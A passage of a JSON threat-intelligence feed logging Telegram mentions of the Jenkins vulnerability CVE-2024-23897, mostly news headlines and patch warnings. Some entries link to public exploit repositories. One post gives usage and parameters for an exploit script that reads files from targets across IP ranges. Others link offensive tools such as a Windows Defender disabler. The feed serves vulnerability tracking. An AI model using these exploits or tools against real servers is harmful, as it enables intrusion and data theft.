Exposed, Code at Risk", "creation_timestamp": "2024-03-19T06:51:22.000000Z"}, {"uuid": "3ec9c181-aefd-4a9c-888b-6d8b0030edc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/187194", "content": "https://ift.tt/FlkRaP2\nCVE-2024-23897 | Jenkins Command Line Interface command information disclosure (Advisory 176839)", "creation_timestamp": "2024-02-18T09:36:12.000000Z"}, {"uuid": "b387fe70-5f72-4712-901e-71f753b6ccee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/211221", "content": "https://ift.tt/nhrQ4q8\nJenkins Args4j CVE-2024-23897: Files Exposed, Code at Risk", "creation_timestamp": "2024-03-19T07:46:05.000000Z"}, {"uuid": "47f7ca6a-7ba5-4b55-9911-c6f8f309f7f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/180606", "content": "https://ift.tt/KIpYxw5\nJenkins Arbitrary File Leak Vulnerability, CVE-2024-23897, Can Lead To RCE", "creation_timestamp": "2024-02-07T10:16:11.000000Z"}, {"uuid": "39d3deb7-7e7f-40c9-a7f1-42284fa43f54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/175118", "content": "https://ift.tt/exCmvW1\nMultiple PoC Exploits Released for Jenkins Flaw CVE-2024-23897", "creation_timestamp": "2024-01-29T09:31:53.000000Z"}, {"uuid": "c8e3bf7b-1e98-4531-9f0f-122443bc87d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/ctinow/175013", "content": "https://ift.tt/exCmvW1\nMultiple PoC exploits released for Jenkins flaw CVE-2024-23897", "creation_timestamp": "2024-01-28T20:11:33.000000Z"}, {"uuid": "81466bf9-1994-460d-8824-9f010a49985d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/information_security_channel/51435", "content": "45,000 Exposed Jenkins Instances Found Amid Reports of In-the-Wild Exploitation\nhttps://www.securityweek.com/45000-exposed-jenkins-instances-found-amid-reports-of-in-the-wild-exploitation/\n\nShadowserver Foundation has seen 45,000 Jenkins instances affected by CVE-2024-23897, which may already be exploited in attacks.\nThe post 45,000 Exposed Jenkins Instances Found Amid Reports of In-the-Wild Exploitation (https://www.securityweek.com/45000-exposed-jenkins-instances-found-amid-reports-of-in-the-wild-exploitation/) appeared first on SecurityWeek (https://www.securityweek.com/).", "creation_timestamp": "2024-01-31T13:39:44.000000Z"}, {"uuid": "c90543ff-0a85-4b75-b1a9-4e3ef6de8ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/175454", "content": "https://ift.tt/2TmR3y9\nJenkins 2.441 / LTS 2.426.3 CVE-2024-23897 Scanner", "creation_timestamp": "2024-01-29T18:32:17.000000Z"}, {"uuid": "2b637661-2896-446e-a585-3a49085fffb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/ctinow/175219", "content": "https://ift.tt/UFmfsNp\nCritical Jenkins RCE flaw exploited in the wild. Patch now! (CVE-2024-23897)", "creation_timestamp": "2024-01-29T13:21:38.000000Z"}, {"uuid": "3f2ee7a5-8dd3-465c-a320-03b261a448c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/175685", "content": "https://ift.tt/sQJnzrk\nJenkins 2.441 / LTS 2.426.3 CVE-2024-23897 Scanner", "creation_timestamp": "2024-01-30T05:21:50.000000Z"}, {"uuid": "8a09fb45-8f61-4223-be2f-49487fe0ab7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/175533", "content": "https://ift.tt/89uHXkn\nCVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability", "creation_timestamp": "2024-01-29T21:21:32.000000Z"}, {"uuid": "026ba169-8ca7-4300-9aca-ee36b3120983", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/174263", "content": "https://ift.tt/1cJk5Kl\nCVE-2024-23897 Exploit", "creation_timestamp": "2024-01-26T15:16:53.000000Z"}, {"uuid": "7baca1ed-e690-4a2b-9eb2-788dafa8e5be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/175153", "content": "https://ift.tt/aRqCp4U\nSeveral PoC exploits targeting the recent critical Jenkins vulnerability CVE-2024-23897 have been made public", "creation_timestamp": "2024-01-29T10:46:42.000000Z"}, {"uuid": "444cdbca-38c8-4634-a7aa-6c10f2f540a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/173030", "content": "https://ift.tt/DYUCMpF\nCVE-2024-23897", "creation_timestamp": "2024-01-24T19:27:02.000000Z"}, {"uuid": "52431a88-ce65-4a8b-8a4f-d40994c8e9f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/8989", "content": "From Limited file read to full access on Jenkins (CVE-2024-23897)\n\nhttps://xphantom.nl/posts/crypto-attack-jenkins/", "creation_timestamp": "2024-08-01T20:07:15.000000Z"}, {"uuid": "95b33247-3193-4185-9c5d-5352cc25cebd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/thehackernews/4456", "content": "\ud83d\udea8 Urgent: Critical Jenkins RCE vulnerability (CVE-2024-23897) discovered. \n \nHackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds. \n \nDetails here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html", "creation_timestamp": "2024-01-25T12:59:42.000000Z"}, {"uuid": "e12f9928-12c5-485e-a881-2a831759d573", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/xakep_ru/15311", "content": "45 000 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Jenkins \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043f\u0435\u0440\u0435\u0434 \u0441\u0432\u0435\u0436\u0435\u0439 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u0441\u0435\u0442\u0438 \u043e\u043a\u043e\u043b\u043e 45 000 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Jenkins, \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0435\u0440\u0435\u0434 \u0441\u0432\u0435\u0436\u0435\u0439 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u043e\u0439 CVE-2023-23897, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u043e\u0432.\n\nhttps://xakep.ru/2024/01/30/cve-2024-23897-servers/", "creation_timestamp": "2024-01-30T09:35:41.000000Z"}, {"uuid": "8e4abeb3-2741-4fa7-80ca-03d4d5217ba1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/thehackernews/5436", "content": "CISA warns of active ransomware exploits targeting Jenkins via the CVE-2024-23897 vulnerability. \n \nIt allows attackers to execute malicious code, putting sensitive data at risk across industries. \n \nRead: https://thehackernews.com/2024/08/cisa-warns-of-critical-jenkins.html \n \nPatch your Jenkins systems now before it's too late.", "creation_timestamp": "2024-08-20T06:55:43.000000Z"}, {"uuid": "d14d6378-2b42-4237-aff6-7f9fac7f964f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/1906", "content": "https://github.com/binganao/CVE-2024-23897\nJenkins RCE\n\n#github #poc", "creation_timestamp": "2024-02-27T23:45:01.000000Z"}, {"uuid": "12c12262-5df4-45fd-aeaa-7ca694cb5ff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/24494", "content": "Tools - Hackers Factory \n\nPoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers\n\nhttps://github.com/persistent-security/SMShell\n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nNuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)\n\nhttps://github.com/kaanatmacaa/CVE-2024-23897\n\nCVE-2023-4427\n\nhttps://github.com/tianstcht/CVE-2023-4427\n\nDisable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)\n\nhttps://github.com/EvilGreys/Disable-Windows-Defender-\n\nA repo for TPM sniffing greatness\n\nhttps://github.com/NoobieDog/TPM-Sniffing\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nSecretPixel is a cutting-edge steganography tool designed to securely conceal sensitive information within images. It stands out in the realm of digital steganography by combining advanced encryption, compression, and a seeded Least Significant Bit (LSB) technique to provide a robust solution for embedding data undetectably.\n\nhttps://github.com/x011/SecretPixel\n\nSmall toolkit for extracting information and dumping sensitive strings from Windows processes\n\nhttps://github.com/mlcsec/proctools\n\nThe code that wasn\u2019t there: Reading memory on an Android device by accident\n\nhttps://github.blog/2023-02-23-the-code-that-wasnt-there-reading-memory-on-an-android-device-by-accident/\n\n#HackersFactory", "creation_timestamp": "2024-02-08T09:31:36.000000Z"}, {"uuid": "7ebd3ed2-22f7-41be-a34b-59beb25b59af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanInt/24519", "content": "Tools - Hackers Factory \n\nLinux anti-debugging and anti-analysis rust library\n\nhttps://github.com/0xor0ne/debugoff\n\nRemote buffer overflow over wifi_stack in wpa_supplicant binary in android 11, platform:samsung a20e, stock options so like works out of the box\n\nhttps://github.com/SpiralBL0CK/Remote-buffer-overflow-over-wifi_stack-in-wpa_supplicant-binary-in-android-11-platform-samsung-a20e\n\nNegoexrelayx - Negoex relaying tool\n\nToolkit for abusing Kerberos PKU2U and NegoEx. Requires impacket It is recommended to install impacket from git directly to have the latest version available\n\nhttps://github.com/morRubin/NegoExRelay\n\nMinimal DNS server built in Rust with rule system and logging.\n\nhttps://github.com/sammwyy/mindns\n\nA repository of code signing certificates known to have been leaked or stolen, then abused by threat actors\n\nhttps://github.com/WithSecureLabs/lolcerts\n\nTo audit the security of read-only domain controllers\n\nhttps://github.com/wh0amitz/SharpRODC\n\nCVE-2024-23897\nJenkins CVE-2024-23897: Arbitrary File Read Vulnerability Leading to RCE\n\nhttps://github.com/h4x0r-dz/CVE-2024-23897\n\nCVE-2024-21893: SSRF Vulnerability in Ivanti Connect Secure\n\nhttps://github.com/h4x0r-dz/CVE-2024-21893.py\n\nHTTP Downgrade attacks with SmuggleFuzz\n\nhttps://moopinger.github.io/blog/smugglefuzz/fuzzing/smuggling/2024/01/31/SmuggleFuzz.html\n\nsmugglefuzz : A customizable and rapid HTTP downgrade smuggling scanner written in Go \n\nhttps://github.com/Moopinger/smugglefuzz\n\nRef : http2smugl : tool helps to detect and exploit HTTP request smuggling in cases it can be achieved via HTTP/2 -> HTTP/1.1 conversion by the frontend server\n\nhttps://github.com/neex/http2smugl\n\nAdvanced Time-based Blind SQL Injection fuzzer for HTTP Headers\n\nhttps://github.com/danialhalo/SqliSniper\n\n#HackersFactory", "creation_timestamp": "2024-04-21T20:01:52.000000Z"}, {"uuid": "9af764a9-e6e7-40ec-9df2-f5be241fc578", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "Telegram/a006QL8PTVftfIt3YT-bFmFtrQtHrBuAoLP2sQLQ2rp08UWPKw", "content": "", "creation_timestamp": "2024-09-20T09:58:52.000000Z"}, {"uuid": "bed2940b-87a8-4783-8401-0114757dcc15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/dragonforceio/1703", "content": "Topik pilihan DFM hari ini: {} CVE-2024-23897 [LEAD-2-RCE]\n\nRepositori ini mengandungi skrip Python yang mengeksploitasi kerentanan kritikal (CVE-2024-23897) dalam Jenkins, yang membawa kepada pembacaan fail sewenang-wenangnya dan pelaksanaan kod jauh (RCE). Kerentanan ini membolehkan penyerang yang tidak disahkan untuk melaksanakan arahan sewenang-wenangnya pada pelayan Jenkins sasaran, yang berpotensi menjejaskan keseluruhan sistem.\n\nUntuk mengetahui lebih lanjut, boleh tekan link thread di bawah.\n\nThread:\nhttps://www.dragonforce.io/threads/cve-2024-23897-lead-2-rce.18153/\n\nForum Rasmi: https://dragonforce.io\nRadio Rasmi: https://radio.dragonforce.io\nFacebook: https://fb.me/dragonforcedotio\nTelegram: https://t.me/dragonforceio\nTwitter: https://twitter.com/dragonforceIO_\nInstagram: https://instagram.com/dragonforceio\nYouTube: https://www.youtube.com/@dragonforceio\nTiktok: http://www.tiktok.com/@dragonforcemalaysia", "creation_timestamp": "2024-02-20T08:05:12.000000Z"}, {"uuid": "3be88889-3870-48c1-a41e-75c4a724f619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/BugCod3/472", "content": "\ud83e\udd87 CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner \ud83e\udd87\n\n\ud83d\udcac Description:\nExploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2. It leverages CVE-2024-23897 to assess and exploit vulnerabilities in Jenkins instances.\n\n\ud83d\udcbb Usage:\nEnsure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.\npython CVE-2024-23897.py -t  -p  -f \nor\npython CVE-2024-23897.py -i  -f \n\n\ud83d\udcca Parameters:\n\u26aa\ufe0f -t or --target: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block.\n\n\u26aa\ufe0f -i or --input-file: Path to input file containing hosts in the format of http://1.2.3.4:8080/ (one per line).\n\n\u26aa\ufe0f -o or --output-file: Export results to file (optional).\n\n\u26aa\ufe0f -p or --port: Specify the port number. Default is 8080 (optional).\n\n\u26aa\ufe0f -f or --file: Specify the file to read on the target system.\n\n\ud83d\ude38 Github\n\n\u2b07\ufe0f Download\n\ud83d\udd12 BugCod3\n\n#CVE #PoC #Scanner\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udc64 T.me/BugCod3BOT \n\ud83d\udce3 T.me/BugCod3", "creation_timestamp": "2024-02-26T21:39:06.000000Z"}, {"uuid": "b20d4883-a0c4-4361-9fab-b05fa76c830b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3442", "content": "https://github.com/safeer-accuknox/Jenkins-Args4j-CVE-2024-23897-POC\n\nJenkins-Args4j-CVE-2024-23897-POC\n#github #exploit", "creation_timestamp": "2024-11-11T17:16:46.000000Z"}, {"uuid": "bc0fbf08-5122-405d-95e8-61b2a741c8b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9866", "content": "#exploit\n1. CVE-2024-23897:\nJenkins RCE PoC\nhttps://github.com/binganao/CVE-2024-23897\n]-> https://github.com/wjlin0/CVE-2024-23897\n]-> scanner: https://github.com/xaitax/CVE-2024-23897\n\n2. CVE-2024-22514:\nRCE in Agent DVR\nhttps://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution\n\n3. CVE-2022-4262:\nType Confusion in V8\nhttps://github.com/mistymntncop/CVE-2022-4262\n]-> https://github.com/bjrjk/CVE-2022-4262", "creation_timestamp": "2024-09-04T05:58:30.000000Z"}, {"uuid": "f2e62dce-0716-4b10-bb40-307b16a1bafb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/9923", "content": "#tools\n#Blue_Team_Techniques\nNuclei template for CVE-2024-23897\n(Jenkins LFI Vulnerability)\nhttps://github.com/kaanatmacaa/CVE-2024-23897", "creation_timestamp": "2024-02-06T16:57:26.000000Z"}, {"uuid": "87a11532-b953-459b-a04c-653517247b3d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/LearnExploit/6415", "content": "Jenkins CVE-2024-23897\n\nLink \n\n#CVE \n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2024-03-30T10:14:40.000000Z"}, {"uuid": "9fca4e46-9325-4054-aa14-89c6ffa784c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/2641", "content": "#Jenkins #RCE #CVE-2024-23897\n\nhttps://github.com/kohsuke/args4j\n\nhttps://github.com/binganao/CVE-2024-23897", "creation_timestamp": "2024-08-16T09:12:45.000000Z"}, {"uuid": "0849f420-33d2-4d81-80e3-380aaf82bd46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/2672", "content": "#Jenkins #RCE #CVE-2024-23897\n\nhttps://github.com/kohsuke/args4j\n\nhttps://github.com/binganao/CVE-2024-23897", "creation_timestamp": "2024-08-16T09:12:58.000000Z"}, {"uuid": "678cb974-4312-4d02-9a83-8e20902afc7b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/2661", "content": "#exploit\n1. CVE-2024-23897:\nJenkins RCE PoC\nhttps://github.com/binganao/CVE-2024-23897\n]-> https://github.com/wjlin0/CVE-2024-23897\n]-> scanner: https://github.com/xaitax/CVE-2024-23897\n\n2. CVE-2024-22514:\nRCE in Agent DVR\nhttps://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution\n\n3. CVE-2022-4262:\nType Confusion in V8\nhttps://github.com/mistymntncop/CVE-2022-4262", "creation_timestamp": "2024-08-16T09:12:53.000000Z"}, {"uuid": "d4a0e317-f91e-42aa-b9d9-864cab8a7e65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/2730", "content": "#tools\n#Blue_Team_Techniques\nNuclei template for CVE-2024-23897\n(Jenkins LFI Vulnerability)\nhttps://github.com/kaanatmacaa/CVE-2024-23897", "creation_timestamp": "2024-08-16T09:13:21.000000Z"}, {"uuid": "0c06cb97-6995-422d-b1b7-f71fbbcfd6dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/2630", "content": "#exploit\n1. CVE-2024-23897:\nJenkins RCE PoC\nhttps://github.com/binganao/CVE-2024-23897\n]-> https://github.com/wjlin0/CVE-2024-23897\n]-> scanner: https://github.com/xaitax/CVE-2024-23897\n\n2. CVE-2024-22514:\nRCE in Agent DVR\nhttps://github.com/Orange-418/CVE-2024-22514-Remote-Code-Execution\n\n3. CVE-2022-4262:\nType Confusion in V8\nhttps://github.com/mistymntncop/CVE-2022-4262", "creation_timestamp": "2024-08-16T09:12:41.000000Z"}]}